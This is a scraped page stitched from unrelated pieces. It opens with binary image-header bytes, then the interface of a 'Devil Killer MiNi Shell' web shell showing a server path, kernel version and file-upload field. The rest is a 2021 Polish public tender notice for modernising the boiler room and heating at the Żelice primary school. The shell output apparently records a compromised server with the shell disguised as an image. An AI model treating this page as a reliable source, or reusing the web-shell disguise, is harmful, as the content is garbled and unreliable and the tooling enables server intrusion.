JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210628/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210628/0009728601-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00097286 z dnia 2021-06-28</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja kotłowni i instalacji centralnego ogrzewania<br/>w Szkole Podstawowej w Żelicach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Wągrowiec</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 570791336</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Cysterska 22</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wągrowiec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">62-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL411 - Pilski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">672680800</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">672680803</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">wagrow@wokiss.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.gminawagrowiec.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja kotłowni i instalacji centralnego ogrzewania<br/>w Szkole Podstawowej w Żelicach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-891755b4-d816-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00097286</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001947/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.8 Modernizacja kotłowni i instalacji centralnego ogrzewania w Szkole Podstawowej w Żelicach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/ug_wagrowiec <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/ug_wagrowiec</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) W<br/>niniejszym postępowaniu o udzielenie zamówienia w tym składanie ofert, wymiana informacji oraz<br/>składanie dokumentów lub oświadczeń między Zamawiającym, a Wykonawcą, odbywa się przy użyciu<br/>środków komunikacji elektronicznej.<br/>2) Oświadczenie, o którym mowa w art.125 ust.1 (tj. oświadczenie o niepodleganiu wykluczeniu i<br/>spełnieniu warunków udziału w postępowaniu w zakresie wskazanym przez Zamawiającego), składa<br/>się, pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym.<br/>3) Komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu domeny<br/>platformazakupowa.pl udostępnionej przez Usługodawcę – operatora platformazakupowowa.pl (zwanej<br/>dalej „platformazakupowa.pl”, którym jest Open Nexus Sp z o.o.<br/>4) Wykonawca zamierzający wziąć udział w postępowaniu, powinien założyć Konto Użytkownika na<br/>„platformazakupowa.pl”, co umożliwi korzystanie ze wszystkich funkcjonalności umożliwiających<br/>uczestnictwo w prowadzonym postępowaniu – dostęp do formularzy do komunikacji oraz do złożenia,<br/>zmiany, wycofania oferty.<br/>5) Ogólne warunki, zasady oraz sposób świadczenia przez Open Nexus Sp z o.o. z siedzibą w<br/>Poznaniu nieodpłatnych usług dla Konta Użytkownika drogą elektroniczną, za pośrednictwem domeny<br/>„platformazakupowa.pl” opisane zostały w Regulaminie platforma zakupowa.pl dla Użytkowników<br/>(Wykonawców) z dnia 24.05.2020r. - zwanego dalej „Regulaminem”- dostępnego w zakładce<br/>„Regulamin”.<br/>6) Wykonawca, przystępując do niniejszego postępowania: akceptuje warunki korzystania z<br/>„platformazakupowa.pl” określone w „Regulaminie” oraz uznaje go za wiążący, stosuje i zapoznał się z<br/>Instrukcją.<br/>7) W w/w dokumentach opisano wymagania techniczne i organizacyjne wysyłania i odbierania<br/>dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji.<br/>8) Komunikacja między Zamawiającym, a Wykonawcami w zakresie wskazanym w SWZ odbywa się za<br/>pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do Zamawiającego”.<br/>9) Zamawiający będzie przekazywał Wykonawcom informacje w formie elektronicznej za<br/>pośrednictwem platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany<br/>specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest<br/>konkretny Wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem<br/>platformazakupowa.pl do konkretnego Wykonawcy.<br/>10) Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452), określa niezbędne wymagania<br/>sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.: stały dostęp do sieci Internet<br/>o gwarantowanej przepustowości nie mniejszej niż 512 kb/s; komputer klasy PC lub MAC o<br/>następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje;<br/>zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja<br/>10.0; włączona obsługa JavaScript; zainstalowany program Adobe Acrobat Reader lub inny<br/>obsługujący format plików .pdf; Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu<br/>TLS 1.3.; oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny<br/>czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego<br/>Urzędu Miar.<br/>11) Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl znajdują się w zakładce<br/>„Instrukcje dla Wykonawców" na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje .</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „Rozporządzenie”, informuję, że:<br/>1) Administratorem Pani/Pana danych osobowych jest Gmina Wągrowiec reprezentowana przez Wójta<br/>Gminy Wągrowiec (adres: ul. Cysterska 22, 62-100 Wągrowiec, tel. 67 26 80 800, e-mail:<br/>wagrow@wokiss.pl .<br/>2) w sprawach z zakresu ochrony danych osobowych mogą Państwo kontaktować się z Inspektorem<br/>Ochrony Danych pod adresem e-mail: inspektor@cbi24.pl<br/>3) dane osobowe będą przetwarzane przez okres zgodnie z art. 78 ust. 1 i 4 ustawy z dnia z dnia 11<br/>września 2019 r.– Prawo zamówień publicznych,<br/>4) podstawą prawną przetwarzania danych jest art. 6 ust. 1 lit. c) ww. Rozporządzenia w związku z<br/>przepisami ustawy Pzp,<br/>5) odbiorcami Pani/Pana danych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 4 ustawy Pzp. Pani/pana dane<br/>osobowe mogą zostać przekazane podmiotom zewnętrznym na podstawie umowy powierzenia<br/>przetwarzania danych osobowych - dostawcy usług poczty mailowej, dostawcy platformy zakupowej<br/>Open NEXUS.<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp,<br/>7) osoba, której dane dotyczą ma prawo do:<br/>- dostępu do treści swoich danych oraz możliwości ich poprawiania, sprostowania, ograniczenia<br/>przetwarzania,<br/>- w przypadku gdy przetwarzanie danych odbywa się z naruszeniem przepisów Rozporządzenia służy<br/>prawo wniesienia skargi do organu nadzorczego tj. Prezesa Urzędu Ochrony Danych Osobowych, ul.<br/>Stawki 2, 00-193 Warszawa,<br/>8) osobie, której dane dotyczą nie przysługuje:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e Rozporządzenia prawo do usunięcia danych osobowych,<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 Rozporządzenia,<br/>- na podstawie art. 21 Rozporządzenia prawo sprzeciwu, wobec przetwarzania danych osobowych,<br/>9) Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia<br/>danych osobowych, o którym mowa w art. 16 Rozporządzenia, nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia publicznego lub konkursu ani zmianą postanowień umowy w<br/>zakresie niezgodnym z ustawą Pzp,<br/>12) wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 Rozporządzenia, nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia<br/>publicznego,<br/>13) w przypadku danych osobowych zamieszczonych przez Administratora w Biuletynie Zamówień<br/>Publicznych, prawa, o których mowa w art. 15 i art. 16 Rozporządzenia, są wykonywane w drodze<br/>żądania skierowanego do Administratora,<br/>14) od dnia zakończenia postępowania o udzielenie zamówienia, w przypadku gdy wniesienie żądania,<br/>o którym mowa w art. 18 ust. 1 Rozporządzenia, spowoduje ograniczenie przetwarzania danych<br/>osobowych zawartych w protokole i załącznikach do protokołu, Administrator nie udostępnia tych<br/>danych zawartych w protokole i w załącznikach do protokołu, chyba że zachodzą przesłanki, o których<br/>mowa w art. 18 ust. 2 Rozporządzenia,<br/>15) skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o<br/>którym mowa w art. 16 Rozporządzenia, nie może naruszać integralności protokołu oraz jego<br/>załączników,<br/>16) ponadto informujemy, iż w związku z przetwarzaniem Pani/Pana danych osobowych nie podlega<br/>Pan/Pani decyzjom, które się opierają wyłącznie na zautomatyzowanym przetwarzaniu, w tym<br/>profilowaniu, o czym stanowi art. 22 Rozporządzenia.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie dotyczy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IGP.271.1.3.2021.FZ</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zamówienie obejmuje zadania:<br/>Zadanie Nr 1 ,,Modernizacja kotłowni w Szkole Podstawowej w Żelicach”,<br/>Zadanie Nr 2 ,,Wymiana instalacji centralnego ogrzewania w Szkole Podstawowej w Żelicach”.<br/>Miejsce realizacji zamówienia: Gmina Wągrowiec, Żelice 14a, 62-113 Żelice, Działka o nr<br/>ewidencyjnym 47/3, Obręb ewidencyjny Żelice, Powiat: wągrowiecki, Województwo:<br/>wielkopolskie.<br/>Zakres robót:<br/>1) Zadanie Nr 1 ,,Modernizacja kotłowni w Szkole Podstawowej w Żelicach”.<br/>Zakres zamówienia obejmuje przebudowę kotłowni w budynku Szkoły Podstawowej w Żelicach.<br/>Kotłownia z kotłem spalającym biomasę zostanie zlokalizowana w pomieszczeniu obecnej<br/>kotłowni wraz z magazynem paliwa. Kotłownia będzie wytwarzać ciepło na potrzeby centralnego<br/>ogrzewania i ciepłej wody użytkowej.<br/>Zakres prac obejmuje m.in.:<br/>- montaż nowych urządzeń kotłowni, w tym kotła na biomasę o mocy 200kW, montaż nowego<br/>czopucha, rozdzielacza wraz z armaturą, wykonanie nowego rurarzu, połączeń hydraulicznych<br/>oraz armatury niezbędnej do prawidłowego działania instalacji, modernizacja instalacji<br/>nawiewno – wywiewnej,<br/>- prace rozbiórkowe w pomieszczeniach kotłowni, w tym: demontaż istniejących kotłów i<br/>armatury towarzyszącej, rurociągów obiegu kotłowego, rozdzielacza i kanału wyciągowego,<br/>skucie jednego z obecnych cokołów pod kotłem,<br/>- skucie i wykonanie nowej posadzki w kotłowni pomieszczeniach magazynowych na jednym<br/>poziomie,<br/>- adaptację pomieszczenia kotła oraz składu opału, wykonanie wydzielonego składu biomasy w<br/>składzie opału (wykonanie muru z bloczków o gr. 24cm z obustronnym tynkiem o klasie EI 120),<br/>zamurowanie ściany pomiędzy pomieszczeniami składu opału,<br/>- wykonanie nowych drzwi wewnętrznych w klasie EIs 60 oraz w klasie EIs 30,<br/>- wymiana drzwi do kotłowni na aluminiowe,<br/>- wykonanie dostępu do magazynu paliwa poprzez drzwi rewizyjne do komory paliwowej o wym.<br/>min. 70x70cm w klasie EI 60,<br/>- zapewnienie odpowiedniej wielkości otworów do transportu paliwa,<br/>- wykonanie prac pomocniczych: przebicia, otwory montażowe, przejścia instalacyjne przez<br/>przegrody budowlane,<br/>- wykonanie drewnianej podłogi w magazynie opału,<br/>- adaptacja istniejących zsypów do współpracy z projektowanymi transporterami biomasy,<br/>- prace wykończeniowe i malarskie w zakresie sufitów i ścian,<br/>- ułożenie płytek gres,<br/>- wykonanie studni chłonnej,<br/>- modernizacja wewnętrznej instalacji elektrycznej w obrębie kotłowni.<br/>2) Zadanie Nr 2 ,,Wymiana instalacji centralnego ogrzewania w Szkole Podstawowej w<br/>Żelicach”.<br/>- Opis stanu istniejącego. Budynek posiada wbudowaną instalację centralnego ogrzewania.<br/>Zasilanie obiektu w ciepło odbywa się z kotłowni stałopalnej znajdującej się w piwnicy budynku. Obiekt posiada wodną, pompową instalację centralnego ogrzewania. Przewody poziome<br/>prowadzone są pod sufitem podpiwniczenia oraz w kanałach podłogowych w pozostałej części<br/>budynku. Przewody zaizolowane są matą z waty szklanej w płaszczu gipsowo okrzemkowym.<br/>Na podejściach do niektórych pionów zamontowane są zawory odcinające. Piony zasilają<br/>grzejniki na poszczególnych kondygnacjach w układzie pojedynczym i podwójnym. Elementami<br/>grzejnymi są grzejniki żeliwne członowe oraz w kilku pomieszczeniach wymienione na nowe<br/>grzejniki stalowe płytowe. Przewody instalacji wykonane są z rur stalowych łączonych poprzez<br/>spawanie. Armatura i uzbrojenie są połączone z instalacją połączeniami skręcanymi i<br/>kołnierzowymi.<br/>- Opis stanu projektowanego. W ramach prac do wykonania przeprowadzić demontaż istniejącej<br/>instalacji centralnego ogrzewania. Demontaż instalacji rurowej - rozbiórka izolacji z wełny<br/>szklanej w otulinie z masy gipsowo-okrzemkowej. Z uwagi na konieczność recyklingu<br/>zdemontowanej izolacji, w ramach robót odspoić izolację od zaizolowanych starych rur.<br/>Demontażowi podlega całe wyposażenie towarzyszące tj. rozdzielacz z osprzętem, zawory,<br/>zbiorniki pośrednie, zbiorniczki odpowietrzające, zawory podpionowe, grzejniki itp. Z uwagi na<br/>dobry stan techniczny grzejników wraz z podejściami i armaturą grzejnikową w obrębie sali<br/>gimnastycznej, grzejniki te pozostają bez zmian i podlegają włączeniu do nowej instalacji rurowej.<br/>Planuje się wykonanie instalacji centralnego ogrzewania, wodnej, pompowej, systemu<br/>zamkniętego o parametrach 75/55 stopni C, zasilanej w ciepło z kotłowni własnej.<br/>Rozprowadzenie przewodów poziomach pod sufitem podpiwniczenia oraz w kanałach<br/>podłogowych części parterowej. Sumaryczne zapotrzebowanie ciepła dla potrzeb centralnego<br/>ogrzewania dla obiektu wynosi Q =161 kW.<br/>Instalację c.o. zaprojektowano z rur ze stali węglowej. Piony, podejścia oraz gałązki grzejnikowe<br/>prowadzone po wierzchu ścian. Przejścia przewodów przez przegrody budowlane w rurach<br/>ochronnych z tworzywa sztucznego.<br/>Elementy grzejne – grzejniki stalowe płytowe. W ramach zadania planuje się zamontować 78<br/>szt. nowych grzejników. Połączenie grzejników z instalacją, poprzez zwory grzejnikowe z<br/>nastawą wstępną montowane na zasilaniu oraz poprzez zawory odcinające imbusowe na<br/>powrocie. Na wkładkach zaworowych grzejników zamontować głowice termostatyczne. Zawór z<br/>głowicą musi mieć możliwość pełnego zamknięcia przepływu (pozycja ,,0”). Odpowietrzenie<br/>instalacji poprzez odpowietrzniki automatyczne z zaworami stopowymi, montowane na końcu<br/>odcinków pionowych oraz poprzez odpowietrzniki stanowiące standardowe wyposażenie<br/>grzejników. Regulacja hydrauliczna poprzez nastawy zaworów sekcyjnych, strefowych,<br/>podpionowych oraz na grzejnikowych. Izolację cieplną przewodów c.o. wykonać zgodnie z<br/>obowiązującymi przepisami. Wszystkie przewody zaizolować termicznie otulinami wykonanymi<br/>ze spienionego polietylenu, a przewody prowadzone w piwnicy i kanale c.o. dodatkowo obłożyć<br/>płaszczem z miękkiego pvc. Instalacja posiada 2 sekcje. Na zasilaniu każdej z sekcji zawór regulacji hydraulicznej, połączyć<br/>rurką impulsową z zaworem stabilizacji ciśnieniowej na powrocie każdej z sekcji. Regulację<br/>precyzyjną przeprowadzić pomiędzy sekcjami po ich zamontowaniu i ich rozruchu na tzw.<br/>przepływach rzeczywistych, a regulację miejscową na zaworach grzejnikowych wg nastaw<br/>zgodnie z rysunkiem. Wszystkie zawory regulacyjne wyposażyć w dopasowane do kształtu<br/>zaworu łupiny termoizolacyjne. Przed oddaniem instalacji do użytku należy wykonać próbę<br/>szczelności wodą lub powietrzem o ciśnieniu 1,5 razy większe od roboczego.<br/>Szczegółowy zakres prac, które należy wykonać określa dokumentacja projektowa, specyfikacje<br/>techniczne wykonania i odbioru robót oraz przedmiary robót, które są załącznikami do SWZ<br/>(Załączniki nr 9, 10, 11). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45331100-7 - Instalowanie centralnego ogrzewania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45331110-0 - Instalowanie kotłów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający dopuszcza możliwość udzielenia zamówień, o których mowa w art.214 ust.1<br/>pkt 7 ustawy Pzp. Zakres oraz warunki na jakich zostaną udzielone te zamówienia:<br/>1) zakres zamówienia: powtórzenie podobnych robót budowlanych jak w zamówieniu podstawowym,<br/>określonych w pkt V.4. SWZ,<br/>2) wielkość zamówienia: do 30% wartości zamówienia podstawowego,<br/>3) zamówienie będzie realizowane na warunkach zbliżonych do warunków określonych w umowie<br/>podstawowej zawartej po przeprowadzeniu przedmiotowego postępowania po uzgodnieniach z Wykonawcą, realizującym zamówienie podstawowe, przy założeniu, że uzgadniane warunki nie będą<br/>mniej korzystne dla Zamawiającego niż warunki zamówienia podstawowego, chyba że w momencie<br/>uzgodnień zaistnieją okoliczności, których nie można było przewidzieć w czasie udzielania zamówienia<br/>podstawowego, które uniemożliwią uzgodnienie warunków nie gorszych niż określone dla 